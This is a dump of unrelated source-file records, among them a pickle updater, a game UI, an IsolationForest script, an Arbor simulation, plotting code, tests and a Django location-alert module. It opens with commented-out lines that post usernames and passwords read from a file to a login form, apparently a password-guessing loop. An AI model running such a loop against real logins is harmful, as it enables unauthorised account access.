2:\n# p = line[:-1]\n# count+=1\n\n# print(u)\n# print(p)\n\n# login_data = dict(username=u, password=p, csrfmiddlewaretoken=csrftoken1)\n# r1 = client.post(url, data=login_data)\n# print(r1.url)\n\n\ntext_file = os.path.expanduser('~/encryption_scheme.pkl')\n\nif sys.argv[1]=='list':\n\tprint('1. AES')\n\tprint('2. RSA')\nelse:\n\tif len(sys.argv)==2 and sys.argv[1]=='update':\n\t\tprint('Do you want to update the data on the server?')\n\t\tans = input('Y/N')\n\t\tif ans == 'Y':\n\t\t\toldenc = os.path.expanduser('~/old_encryption_scheme.pkl')\n\t\t\twith open(oldenc,'wb') as fw:\n\t\t\t\twith open(text_file, 'rb') as fr:\n\t\t\t\t\tfor l in fr:\n\t\t\t\t\t\tpickle.dump(l,fw)\n\t\ta = input(\"Schema used: \")\n\t\tif a == 'AES':\n\t\t\tk = input(\"Key: \")\n\t\t\tpas = input(\"Passphrase: \")\n\t\t\twith open(text_file,'wb') as fw:\n\t\t\t\tpickle.dump(['AES',pas],fw)\n\t\telif a == 'RSA':\n\t\t\twith open(text_file,'wb') as fw:\n\t\t\t\tpickle.dump('RSA',fw)\n\t\telse:\n\t\t\tprint(\"Wrong Schema\")\n\t\t\tprint(\"Use 'spc en-de list' to view available choices\")\n\t\t\texit(0)\n\n\telse:\n\t\tfn = os.path.expanduser(sys.argv[2])\n\t\tif sys.argv[1]=='update':\n\t\t\tprint('Do you want to update the data on the server?')\n\t\t\tans = input('Y/N')\n\t\t\tif ans == 'Y':\n\t\t\t\toldenc = os.path.expanduser('~/old_encryption_scheme.pkl')\n\t\t\t\twith open(oldenc,'wb') as fw:\n\t\t\t\t\twith open(text_file, 'rb') as fr:\n\t\t\t\t\t\tfor l in fr:\n\t\t\t\t\t\t\tpickle.dump(l,fw)\n\t\t\twith open(f,'wb') as fw:\n\t\t\t\tpickle.dump('1',fw)\n\t\t\twith open(text_file,'wb') as fw:\n\t\t\t\twith open(fn, 'rb') as fr:\n\t\t\t\t\tfor l in fr:\n\t\t\t\t\t\tpickle.dump(l,fw)\n\t\telif sys.argv[1]=='dump':\n\t\t\twith open(fn, 'wb') as fw:\n\t\t\t\twith open(text_file,'rb') as fr:\n\t\t\t\t\tfor l in fr:\n\t\t\t\t\t\tpickle.dump(l,fw)","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"463783669","text":"@classmethod\ndef __draw_control(cls):\n 距离 = 5\n # 输入系统(阶段)\n cls.draw_line()\n print(' ' * (cls.宽度 // 4 - 4) + \"选项:\\n\")\n if cls.键盘监听 == 'up' and cls.指针 > 0:\n cls.指针 -= 1\n cls.键盘监听 = None\n if cls.键盘监听 == 'down' and cls.指针 < 
len(cls.控制) - 1:\n cls.指针 += 1\n cls.键盘监听 = None\n 指针 = 0\n while 指针 < len(cls.控制):\n if 指针 == cls.指针:\n cls.printc(' ' * (cls.宽度 // 4 - 3 - 距离) + \">>\" + ' ' * 距离 + str(cls.color(cls.控制[指针])), 居中=False)\n else:\n cls.printc(' ' * (cls.宽度 // 4) + str(cls.color(cls.控制[指针])), 居中=False)\n 指针 += 1\n if cls.键盘监听 == 'enter' or cls.键盘监听 == 'space':\n cls.__control(cls.控制[cls.指针])\n # 记得改\n cls.键盘监听 = None\n\n\n@classmethod\ndef __control(cls, string):\n if string in (\"准备\",):\n 网络.发送(行为='准备', 对象=cls.控制[cls.指针])\n elif string == \"使用技能\":\n if 游戏.自己.回合: # 记得去 自己.回合 写 True,这是个布尔\n 网络.发送(行为='技能', 对象=游戏.自己.用户名)\n # 这里写技能什么乱七八糟的\n\n else:\n 网络.发送(行为=cls.控制[cls.指针], 对象=游戏.自己.用户名)\n","sub_path":"Client/client/UIControl.py","file_name":"UIControl.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"611080199","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Aug 1 14:25:53 2021\r\n\r\n@author: daniel pordeus\r\nLista 4 0 Random Forest\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 3 23:02:21 2021\r\n\r\n@author: danie\r\n\"\"\"\r\n#Importando as bibliotecas\r\nimport numpy as np\r\nfrom sklearn import metrics\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.metrics import accuracy_score\r\n#from sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.ensemble import IsolationForest\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import plot_precision_recall_curve\r\n\r\n## funcoes úteis\r\n# Função para avaliar o desempenho dos algoritmos. Ele retorna a média das \r\n# métricas, acurácia no caso.\r\ndef avalia_classificador(clf, kf, X, y, f_metrica):\r\n metrica_val = []\r\n metrica_train = []\r\n for train, valid in kf.split(X,y):\r\n x_train = X[train]\r\n y_train = y[train]\r\n x_valid = X[valid]\r\n y_valid = y[valid]\r\n clf.fit(x_train, y_train)\r\n y_pred_val = clf.predict(x_valid)\r\n y_pred_train = clf.predict(x_train)\r\n metrica_val.append(f_metrica(y_valid, y_pred_val))\r\n metrica_train.append(f_metrica(y_train, y_pred_train))\r\n return np.array(metrica_val).mean(), np.array(metrica_train).mean()\r\n\r\n# Para simplificar a apresentação dos resultados e evitar repetição de código criamos a seguinte função auxuliar para imprimir os resultados.\r\ndef apresenta_metrica(nome_metrica, metrica_val, metrica_train, percentual = False):\r\n c = 100.0 if percentual else 1.0\r\n print('{} (validação): {}{}'.format(nome_metrica, metrica_val * c, '%' if percentual else ''))\r\n print('{} (treino): {}{}'.format(nome_metrica, metrica_train * c, '%' if percentual else ''))\r\n \r\ndef F1_score(revocacao, precisao):\r\n return 2*(revocacao*precisao)/(revocacao+precisao)\r\n\r\ndef novoAvaliaClassificador(y_original, y_previsto):\r\n falsoPositivo = 0\r\n verdadeiroPositivo = 0\r\n falsoNegativo = 0\r\n verdadeiroNegativo = 0\r\n for x in range(y_original.shape[0]):\r\n if y_original[x] == 0:\r\n if y_previsto[x] == 0:\r\n verdadeiroNegativo = verdadeiroNegativo + 1\r\n else:\r\n falsoNegativo = falsoNegativo + 1\r\n if y_original[x] == 1:\r\n if y_previsto[x] == 1:\r\n verdadeiroPositivo = verdadeiroPositivo + 1\r\n else:\r\n falsoPositivo = falsoPositivo + 1\r\n \r\n return falsoPositivo, verdadeiroPositivo, falsoNegativo, verdadeiroNegativo\r\n\r\ndef avalia_classificador_mais_metricas(clf, kf, X, y, f_metrica):\r\n metrica_val = []\r\n metrica_train = []\r\n precisao_val = []\r\n revocacao_val = []\r\n precisao_treino = []\r\n 
revocacao_treino = []\r\n \r\n for train, valid in kf.split(X,y):\r\n x_train = X[train]\r\n y_train = y[train]\r\n x_valid = X[valid]\r\n y_valid = y[valid]\r\n clf.fit(x_train, y_train)\r\n y_pred_val = clf.predict(x_valid)\r\n y_pred_train = clf.predict(x_train)\r\n metrica_val.append(f_metrica(y_valid, y_pred_val))\r\n FP_treino, VP_treino, FN_treino, VN_treino = novoAvaliaClassificador(y_train, y_pred_train)\r\n FP_val, VP_val, FN_val, VN_val = novoAvaliaClassificador(y_valid, y_pred_val)\r\n metrica_train.append(f_metrica(y_train, y_pred_train))\r\n precisao_treino.append(VP_treino / (VP_treino + FP_treino))\r\n revocacao_treino.append(VP_treino / (VP_treino + FN_treino))\r\n print(f\"Treino Precisao={formataSaida((VP_treino / (VP_treino + FP_treino)))} Revocacao={formataSaida(VP_treino / (VP_treino + FN_treino))}\")\r\n precisao_val.append(VP_val / (VP_val + FP_val))\r\n revocacao_val.append(VP_val / (VP_val + FN_val))\r\n print(f\"Validação Precisao={formataSaida(VP_val / (VP_val + FP_val))} Revocacao={formataSaida(VP_val / (VP_val + FN_val))}\")\r\n print(f\"F1-Score Treino = {F1_score((VP_treino / (VP_treino + FN_treino)), (VP_treino / (VP_treino + FP_treino)))}\")\r\n print(f\"F1-Score Validação = {F1_score((VP_val / (VP_val + FN_val)), (VP_val / (VP_val + FP_val)))}\")\r\n return np.array(metrica_val).mean(), np.array(metrica_train).mean(), np.array(precisao_treino).mean(), np.array(revocacao_treino).mean(), np.array(precisao_val).mean(), np.array(revocacao_val).mean()\r\n\r\ndef rodadaUnica(clf, X, y, f_metrica):\r\n clf.fit(X, y)\r\n y_pred_train = clf.predict(X)\r\n FP_treino, VP_treino, FN_treino, VN_treino = novoAvaliaClassificador(y, y_pred_train)\r\n metrica_train = (f_metrica(y, y_pred_train))\r\n precisao_treino = (VP_treino / (VP_treino + FP_treino))\r\n revocacao_treino = (VP_treino / (VP_treino + FN_treino))\r\n #print(f\"Precisao={formataSaida(precisao_treino)} Revocacao={formataSaida(revocacao_treino)}\")\r\n print(f\"F1-Score = {F1_score(precisao_treino, revocacao_treino)}\")\r\n return metrica_train, precisao_treino, revocacao_treino, y_pred_train\r\n\r\n\r\ndef formataSaida(valor):\r\n saidaFormatada = \"{:.2f}\".format(valor*100)\r\n return saidaFormatada + \"%\"\r\n\r\n## MAIN ##\r\ndataset = np.genfromtxt('E:\\\\Doutorado\\\\Aulas_Notas e Videos\\\\AA\\\\Listas\\\\Lista 4\\\\bostonbin.csv', delimiter=',', skip_header=1)\r\n#embaralhando entrada\r\nnp.random.shuffle(dataset)\r\n\r\n#divisao de conjuntos treinamento, testee e validacao\r\ntreino_size = int(np.floor((0.7 * len(dataset))))\r\n\r\ntreino_set = dataset[0:treino_size,:]\r\nteste_set = dataset[treino_size:,:]\r\n\r\ncoluna = dataset.shape[1] - 1\r\n#X\r\nX_treino = treino_set[:,:coluna]\r\nX_teste = teste_set[:,:coluna]\r\n\r\n#Y\r\nY_treino = treino_set[:,coluna]\r\nY_teste = teste_set[:,coluna]\r\n\r\n### Random Forest\r\n# Dividindo os dados em 10 folds.\r\nkf = KFold(n_splits=10, shuffle=True)\r\nbest = [0, 0] #acuracia, melhor max depth, melhor num estimadores\r\nn_classificadores = np.arange(10, 201, 10)\r\n#fpr = dict()\r\n#tpr = dict()\r\n#i = 0\r\nfor nclass in n_classificadores:\r\n rfc = IsolationForest(n_estimators=nclass)\r\n print(f\"### Estimadores={nclass} ###\")\r\n\r\n media_acuracia_val, media_acuracia_train, media_precisao_treino, media_revocacao_treino, media_precisao_val, media_revocacao_val = avalia_classificador_mais_metricas(rfc, kf, X_treino, Y_treino, accuracy_score)\r\n f1_score_treino = F1_score(media_revocacao_treino, media_precisao_treino)\r\n f1_score_validacao = 
F1_score(media_revocacao_val, media_precisao_val)\r\n apresenta_metrica('F1-Score', f1_score_validacao, f1_score_treino, percentual=False)\r\n \r\n #verifico o melhor pelo F1-Score Validacao\r\n if best[0] <= f1_score_validacao:\r\n best = [f1_score_validacao, nclass]\r\n print(\"#############################\") \r\nprint(f\"Melhor F1-Score de Validação: {best[0]}, Estimador={best[1]}\")\r\n\r\n# Rodada completa com melhor gamma e C\r\nprint(\"Rodada completa de Treinamento com melhor Max Depth e Estimadores\")\r\nrfc_treino_total = IsolationForest(n_estimators=best[1])\r\nmetrica, precisao, revocacao, y_pred_final = rodadaUnica(rfc_treino_total, X_treino, Y_treino, accuracy_score)\r\n\r\nprint(f\"Acurácia: {formataSaida(metrica)}\")\r\nprint(f\"Precisao: {formataSaida(precisao)}\")\r\nprint(f\"Revocacao: {formataSaida(revocacao)}\")\r\n\r\n# Teste\r\nprint(\"\")\r\nprint(\"Treino\")\r\nmetrica, precisao, revocacao, y_pred = rodadaUnica(rfc_treino_total, X_teste, Y_teste, accuracy_score)\r\nmetrics.plot_roc_curve(rfc_treino_total, X_teste, Y_teste)\r\ndisp = plot_precision_recall_curve(rfc_treino_total, X_teste, Y_teste)\r\ndisp.ax_.set_title('Precision-Recall Binária')\r\n\r\nprint(f\"Acurácia: {formataSaida(metrica)}\")\r\nprint(f\"Precisao: {formataSaida(precisao)}\")\r\nprint(f\"Revocacao: {formataSaida(revocacao)}\")\r\n\r\nplt.show() ","sub_path":"py_IsolationForest.py","file_name":"py_IsolationForest.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"300810297","text":"import arbor\nimport pandas, seaborn\nfrom math import sqrt\n\n# Construct a cell with the following morphology.\n# The soma (at the root of the tree) is marked 's', and\n# the end of each branch i is marked 'bi'.\n#\n# b1\n# /\n# s----b0\n# \\\n# b2\n\ndef make_cable_cell(gid):\n # Associate labels to tags\n labels = arbor.label_dict()\n labels['soma'] = '(tag 1)'\n labels['dend'] = '(tag 3)'\n\n # Build a segment tree\n tree = arbor.segment_tree()\n\n # Soma (tag=1) with radius 6 μm, modelled as cylinder of length 2*radius\n s = tree.append(arbor.mnpos, arbor.mpoint(-12, 0, 0, 6), arbor.mpoint(0, 0, 0, 6), tag=1)\n\n # Single dendrite (tag=3) of length 100 μm and radius 2 μm attached to soma.\n b0 = tree.append(s, arbor.mpoint(0, 0, 0, 2), arbor.mpoint(100, 0, 0, 2), tag=3)\n\n # Attach two dendrites (tag=3) of length 50 μm to the end of the first dendrite.\n # Radius tapers from 2 to 0.5 μm over the length of the dendrite.\n b1 = tree.append(b0, arbor.mpoint(100, 0, 0, 2), arbor.mpoint(100+50/sqrt(2), 50/sqrt(2), 0, 0.5), tag=3)\n # Constant radius of 1 μm over the length of the dendrite.\n b2 = tree.append(b0, arbor.mpoint(100, 0, 0, 1), arbor.mpoint(100+50/sqrt(2), -50/sqrt(2), 0, 1), tag=3)\n\n # Mark location for synapse at the midpoint of branch 1 (the first dendrite).\n labels['synapse_site'] = '(location 1 0.5)'\n # Mark the root of the tree.\n labels['root'] = '(root)'\n\n cell = arbor.cable_cell(tree, labels)\n\n # Put hh dynamics on soma, and passive properties on the dendrites.\n cell.paint('\"soma\"', 'hh')\n cell.paint('\"dend\"', 'pas')\n # Attach a single synapse.\n cell.place('\"synapse_site\"', 'expsyn')\n # Attach a spike detector with threshold of -10 mV.\n cell.place('\"root\"', arbor.spike_detector(-10))\n\n return cell\n\nclass ring_recipe (arbor.recipe):\n\n def __init__(self, n=10):\n # The base C++ class constructor must be called first, to ensure that\n # all memory in the C++ class is 
initialized correctly.\n arbor.recipe.__init__(self)\n self.ncells = n\n\n # The num_cells method that returns the total number of cells in the model\n # must be implemented.\n def num_cells(self):\n return self.ncells\n\n # The cell_description method returns a cell\n def cell_description(self, gid):\n return make_cable_cell(gid)\n\n def num_targets(self, gid):\n return 1\n\n def num_sources(self, gid):\n return 1\n\n # The kind method returns the type of cell with gid.\n # Note: this must agree with the type returned by cell_description.\n def cell_kind(self, gid):\n return arbor.cell_kind.cable\n\n # Make a ring network\n def connections_on(self, gid):\n src = (gid-1)%self.ncells\n w = 0.01\n d = 5\n return [arbor.connection(arbor.cell_member(src,0), arbor.cell_member(gid,0), w, d)]\n\n # Attach a generator to the first cell in the ring.\n def event_generators(self, gid):\n if gid==0:\n sched = arbor.explicit_schedule([1])\n return [arbor.event_generator(arbor.cell_member(0,0), 0.1, sched)]\n return []\n\n def get_probes(self, gid):\n loc = arbor.location(0, 0) # at the soma\n return [arbor.cable_probe('voltage', loc)]\n\ncontext = arbor.context(threads=12, gpu_id=None)\nprint(context)\n\nmeters = arbor.meter_manager()\nmeters.start(context)\n\nncells = 4\nrecipe = ring_recipe(ncells)\nprint(f'{recipe}')\n\nmeters.checkpoint('recipe-create', context)\n\nhint = arbor.partition_hint()\nhint.prefer_gpu = True\nhint.gpu_group_size = 1000\nprint(f'{hint}')\n\nhints = dict([(arbor.cell_kind.cable, hint)])\ndecomp = arbor.partition_load_balance(recipe, context, hints)\nprint(f'{decomp}')\n\nmeters.checkpoint('load-balance', context)\n\nsim = arbor.simulation(recipe, decomp, context)\n\nmeters.checkpoint('simulation-init', context)\n\nspike_recorder = arbor.attach_spike_recorder(sim)\n\n# Attach a sampler to the voltage probe on cell 0.\n# Sample rate of 10 sample every ms.\nsamplers = [arbor.attach_sampler(sim, 0.1, arbor.cell_member(gid,0)) for gid in range(ncells)]\n\ntfinal=100\nsim.run(tfinal)\nprint(f'{sim} finished')\n\nmeters.checkpoint('simulation-run', context)\n\n# Print profiling information\nprint(f'{arbor.meter_report(meters, context)}')\n\n# Print spike times\nprint('spikes:')\nfor sp in spike_recorder.spikes:\n print(' ', sp)\n\n# Plot the recorded voltages over time.\nprint(\"Plotting results ...\")\ndf_list = []\nfor gid in range(ncells):\n times = [s.time for s in samplers[gid].samples(arbor.cell_member(gid,0))]\n volts = [s.value for s in samplers[gid].samples(arbor.cell_member(gid,0))]\n df_list.append(pandas.DataFrame({'t/ms': times, 'U/mV': volts, 'Cell': f\"cell {gid}\"}))\n\ndf = pandas.concat(df_list)\nseaborn.relplot(data=df, kind=\"line\", x=\"t/ms\", y=\"U/mV\",hue=\"Cell\").savefig('network_ring_result.svg')\n","sub_path":"python/example/network_ring.py","file_name":"network_ring.py","file_ext":"py","file_size_in_byte":4878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"247478507","text":"import math\n\n\ndef make_divisors(n):\n divisors = []\n for i in range(1, int(n**0.5)+1):\n if n % i == 0:\n divisors.append(i)\n if i != n // i:\n divisors.append(n//i)\n\n return divisors\n\n\nN, M = map(int, input().split())\ndivisors = make_divisors(M)\nans = 1\nfor d in divisors:\n if d*N <= M:\n ans = max(ans, d)\nprint(ans)\n","sub_path":"ABC_D/ABC112_D.py","file_name":"ABC112_D.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 
+{"seq_id":"385104769","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndo_lensing = True\nif do_lensing == True:\n\tdir = 'data_r_yeslensing/'\nelse:\n\tdir = 'data_r_nolensing/'\n\t\nfn = dir + 'test_r_0_scalCls.dat'\ncl = np.genfromtxt(fn, names = True)\n\nr = '0.056404616022847'\nr_num =0.056404616022847\nfn = dir + 'test_r_%s_scalCls.dat'%r\ncl_scal = np.genfromtxt(fn, names = True)\n\nfn = dir + 'test_r_%s_tensCls.dat'%r\ncl_tens = np.genfromtxt(fn, names = True)\n\nfn = dir + 'test_r_%s_totCls.dat'%r\ncl_tot = np.genfromtxt(fn, names = True)\n\nfn = dir + 'test_r_%s_lenspotentialCls.dat'%r\ncl_lenspotential = np.genfromtxt(fn, names = True)\n\nfn = dir + 'test_r_%s_lensedCls.dat'%r\ncl_lensed = np.genfromtxt(fn, names = True)\n\nfn = dir + 'test_r_%s_lensedtotCls.dat'%r\ncl_lensedtot = np.genfromtxt(fn, names = True)\n\nfn = dir + 'test_r_%s_tensCls.dat'%0.01\ncl_tens_0p01 = np.genfromtxt(fn, names = True)\n\nfig, ax = plt.subplots()\n\n#ax.loglog(cl['L'], cl['TT'], '-', label = 'TT,r=0')\n#ax.loglog(cl['L'], cl['TE'], '-', label = 'TE,r=0')\n#ax.loglog(cl['L'], cl['EE'], '-', label = 'EE,r=0')\n\n#ax.loglog(cl_scal['L'], cl_scal['TT'], '--', label = 'TT,r=%3.2f'%r_num)\n#ax.loglog(cl_scal['L'], cl_scal['TE'], '--', label = 'TE,r=%3.2f'%r_num)\n#ax.loglog(cl_scal['L'], cl_scal['EE'], '--', label = 'EE,r=%3.2f'%r_num)\n\n#ax.loglog(cl_tens['L'], cl_tens['TT'], '-.', label = 'TT,r=%3.2f'%r_num)\n#ax.loglog(cl_tens['L'], cl_tens['TE'], '-.', label = 'TE,r=%3.2f'%r_num)\n#ax.loglog(cl_tens['L'], cl_tens['EE'], '-.', label = 'EE,r=%3.2f'%r_num)\n#ax.loglog(cl_tens['L'], cl_tens['BB'], '-.', label = 'BB,r=%3.2f'%r_num)\n\n#ax.loglog(cl_tens['L'][0:1400], cl_tens['EE'][0:1400]+ cl_scal['EE'][0:1400], '-.', label = 'EE,r=%3.2f'%r_num)\n\n#ax.loglog(cl_tot['L'], cl_tot['TT'], '-.', label = 'TT,r=%3.2f'%r_num)\n#ax.loglog(cl_tot['L'], cl_tot['TE'], '-.', label = 'TE,r=%3.2f'%r_num)\n#ax.loglog(cl_tot['L'], cl_tot['EE'], '-.', label = 'EE,r=%3.2f'%r_num)\n#ax.loglog(cl_tot['L'], cl_tot['BB'], '-.', label = 'BB,r=%3.2f'%r_num)\n\n#ax.loglog(cl_lensed['L'], cl_lensed['EE'], 'b--', lw = 1, label = 'EE,lensed')\nax.loglog(cl_lensed['L'], cl_lensed['BB'], 'b--', lw = 2, label = 'BB,lensed')\n#ax.loglog(cl_tens['L'], cl_tens['EE'], 'r-.', lw = 1, label = 'EE,tensor')\nax.loglog(cl_tens['L'], cl_tens['BB'], 'r-.', lw = 2, label = 'BB,tensor')\nax.loglog(cl_tens_0p01['L'], cl_tens_0p01['BB'], 'r-.', lw = 2, label = 'BB,tensor,r=0.01')\nax.loglog(cl_lensedtot['L'], cl_lensedtot['EE'], 'k-.', lw = 1, label = 'EE,lensedtot')\n#ax.loglog(cl_lensedtot['L'], cl_lensedtot['BB'], 'k-.', lw = 2, label = 'BB,lensedtot')\nax.set_title('r=%3.2f'%r_num)\nax.set_xlabel(r'$l$')\nax.set_ylabel(r'$l(l+1)C_l/(2\\pi) [\\mu\\mathrm{K}^2]$')\nax.legend()\n#if do_lensing == True:\n#\tax.loglog(cl3['L'], cl3['BB'], ':', label = 'BB,r=%3.2f'%r)\t\t\n\t\t\n#fig.savefig('plots/plot_cl_tensor_vs_lensing_Bmodes_r_0.06.pdf')\nfig.savefig('plots/plot_cl_tensor_vs_lensing_Bmodes_reproducing_0.01.pdf')","sub_path":"s2cnn/examples/cosmo/plot_Cl_r.py","file_name":"plot_Cl_r.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"444648219","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 6 11:29:11 2018\r\n\r\nThe Fibonacci sequence is defined by the recurrence relation:\r\n\r\nFn = Fn−1 + Fn−2, where F1 = 1 and F2 = 1.\r\nHence the first 12 terms will be:\r\n\r\nF1 = 1\r\nF2 = 1\r\nF3 = 2\r\nF4 = 3\r\nF5 = 
5\r\nF6 = 8\r\nF7 = 13\r\nF8 = 21\r\nF9 = 34\r\nF10 = 55\r\nF11 = 89\r\nF12 = 144\r\nThe 12th term, F12, is the first term to contain three digits.\r\n\r\nWhat is the index of the first term in the Fibonacci sequence to contain 1000 digits?\r\n@author: pallo\r\n\"\"\"\r\n\r\n# Def a fib function\r\ndef fib(n):\r\n a = 1\r\n b = 0\r\n while n > 1:\r\n a, b = a+b, a\r\n n = n - 1\r\n return a\r\n\r\n# find the index of the first term in the Fibonacci sequence to contain 1000 digits\r\ni=0\r\nwhile len(str(fib(i)))<1000:\r\n i = i+1\r\n \r\nprint(i)","sub_path":"ex025.py","file_name":"ex025.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"501551242","text":"def exception_handling():\n try:\n a = 10\n b = 20\n c = 0\n\n d = (a + b)/c\n print(d)\n except:\n print('Exception happend')\n #raise Exception('This is raised')\n else:\n print('Else executed')\n finally:\n print('Finally, always executed')\n\ncars = dict(make = 'hyundai', model = 'sonata', year = 2015)\ndef except_cars():\n try:\n print(cars['color'])\n except:\n # raise Exception('Here is the dictionary exception:')\n print('Exception handled')\n else:\n print('This is else block')\n finally:\n print('Execution finished: this is the finally block')\n\nexception_handling()\nexcept_cars()","sub_path":"Udemy_python_anyone_can_code/Scratch_papers/exceptions_practice.py","file_name":"exceptions_practice.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"225175523","text":"# -*- coding: utf-8 -*-\nimport mock\nfrom pyramid.testing import DummyRequest\nimport pytest\n\nfrom h import features\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef features_override(request):\n patcher = mock.patch.dict('h.features.FEATURES', {\n 'notification': \"A test flag for testing with.\"\n })\n patcher.start()\n request.addfinalizer(patcher.stop)\n\n\ndef test_flag_enabled_raises_for_undocumented_feature():\n request = DummyRequest()\n\n with pytest.raises(features.UnknownFeatureError):\n features.flag_enabled(request, 'wibble')\n\n\ndef test_flag_enabled_looks_up_feature_by_name(feature_model):\n request = DummyRequest()\n\n features.flag_enabled(request, 'notification')\n\n feature_model.get_by_name.assert_called_with('notification')\n\n\ndef test_flag_enabled_false_if_not_in_database(feature_model):\n feature_model.get_by_name.return_value = None\n request = DummyRequest()\n\n result = features.flag_enabled(request, 'notification')\n\n assert not result\n\n\ndef test_flag_enabled_false_if_everyone_false(feature_model):\n request = DummyRequest()\n\n result = features.flag_enabled(request, 'notification')\n\n assert not result\n\n\ndef test_flag_enabled_true_if_everyone_true(feature_model):\n feature_model.get_by_name.return_value.everyone = True\n request = DummyRequest()\n\n result = features.flag_enabled(request, 'notification')\n\n assert result\n\n\ndef test_flag_enabled_false_when_admins_true_normal_request(feature_model):\n feature_model.get_by_name.return_value.admins = True\n request = DummyRequest()\n\n result = features.flag_enabled(request, 'notification')\n\n assert not result\n\n\ndef test_flag_enabled_true_when_admins_true_admin_request(authn_policy,\n feature_model):\n authn_policy.effective_principals.return_value = ['group:__admin__']\n feature_model.get_by_name.return_value.admins = True\n request = DummyRequest()\n\n result = 
features.flag_enabled(request, 'notification')\n\n    assert result\n\n\ndef test_flag_enabled_false_when_staff_true_normal_request(feature_model):\n    \"\"\"It should return False for staff features if user is not staff.\n\n    If a feature is enabled for staff, and the user is not a staff member,\n    flag_enabled() should return False.\n\n    \"\"\"\n    # The feature is enabled for staff members.\n    feature_model.get_by_name.return_value.staff = True\n\n    request = DummyRequest()\n\n    assert features.flag_enabled(request, 'notification') is False\n\n\ndef test_flag_enabled_true_when_staff_true_staff_request(authn_policy,\n                                                         feature_model):\n    # The authorized user is a staff member.\n    authn_policy.effective_principals.return_value = ['group:__staff__']\n\n    # The feature is enabled for staff.\n    feature_model.get_by_name.return_value.staff = True\n\n    request = DummyRequest()\n\n    assert features.flag_enabled(request, 'notification') is True\n\n\n@pytest.fixture\ndef feature_model(request):\n    patcher = mock.patch('h.features.Feature', autospec=True)\n    request.addfinalizer(patcher.stop)\n    model = patcher.start()\n    model.get_by_name.return_value.everyone = False\n    model.get_by_name.return_value.admins = False\n    return model\n","sub_path":"h/test/features_test.py","file_name":"features_test.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"559442405","text":"from pahera.PythonModules import SendSMS_mod\nfrom pahera.PythonModules import ModularisedTracks_mod\nfrom pahera.Utilities import RandomNoGenerator\nfrom datetime import datetime\nimport time\nfrom django.db import connection, transaction\nfrom geopy.geocoders import Nominatim\nfrom pahera.Utilities import DictFetchAll\nfrom pahera.Utilities import WritingToJson\nfrom pahera.models import Person, Tracks, User_login, Trusted_friends, Otp, ViewFriendTracks, ModularisedTracks\n\n# To store the alerts or tracks data sent from the user through app..!!!\ndef store_tracks(track_data):\n    authID = RandomNoGenerator.getCode() # Generating random id to append it to the link..!!!\n    # The below link will be sent to the user's trusted friends, added by the user..!!!\n    link = \"http://54.254.248.83:8020/pahera/viewfriendtrack/\" + authID +\"/\"\n    date_current = time.strftime(\"%Y-%m-%d\")\n    time_current = time.strftime(\"%H:%M:%S\")\n    geolocator = Nominatim()\n    lati = track_data['latitude']\n    longi = track_data['longitude']\n    latlong = lati, longi\n    location = geolocator.reverse(latlong)\n    track_data['state'] = location.raw['address']['state']\n    # The below try, excepts are because of the city name issue..!!!\n    # For some cities the geolocator doesn't have state_district or city or town, so whichever is available will be stored in the db..!!!\n    try: # If State_district exists..!!!\n        track_data['state_district'] = location.raw['address']['state_district']\n    except KeyError: # If Not..!!!\n        try : # If city exists..!!!\n            track_data['state_district'] = location.raw['address']['city']\n        except KeyError: # If Not..!!!\n            try: # If town exists..!!!\n                track_data['state_district'] = location.raw['address']['town']\n                location.raw['address']['town']\n            except: # If Nothing exists..!!!\n                track_data['state_district'] = \"others\"\n    track_data['country'] = location.raw['address']['country_code']\n    track_data['address'] = location.raw['display_name']\n    person = Person.objects.get(id = track_data['person'])\n    track = Tracks(person = person, latitude = track_data['latitude'], longitude = 
track_data['longitude'], date = date_current, time = time_current, media_type = track_data['mediaType'], t_type = track_data['t_type'], message = track_data['message'], media_link = link, state_district = track_data['state_district'], state = track_data['state'], country = track_data['country'], address = track_data['address'])\n \n track.save()\n \n # Storing track for the users friend..!!!\n friendTrack = ViewFriendTracks(person = person, latitude = track_data['latitude'], longitude = track_data['longitude'], date = date_current, time = time_current, media_type = track_data['mediaType'], auth_id = authID, message = track_data['message'])\n \n friendTrack.save()\n print(\"Track Added Successfully..!!!\")\n post_new = {}\n post_new['PhoneNo'] = person.phone_no\n dataCheck = {}\n friends_list = {}\n friends_list = Trusted_friends.objects.filter(person = person)\n message_details = {}\n \n message_details['1'] = \"You got new alert from (%s) on %s, at %s. \\n click on link to see the Track. \\n %s\" % (person.first_name, date_current, time_current, link)\n for post in friends_list:\n message = message_details['1']\n # To Do..!!!\n #dataCheck['ph_no'] = .phone_no\n #SendSMS_mod.sendAlert(dataCheck, post_new, message)\n \n # This module is used to store the tracks in a proper format based on,\\ country, state, cities..!!!\n ModularisedTracks_mod.insertTrack(track_data, date_current, time_current, 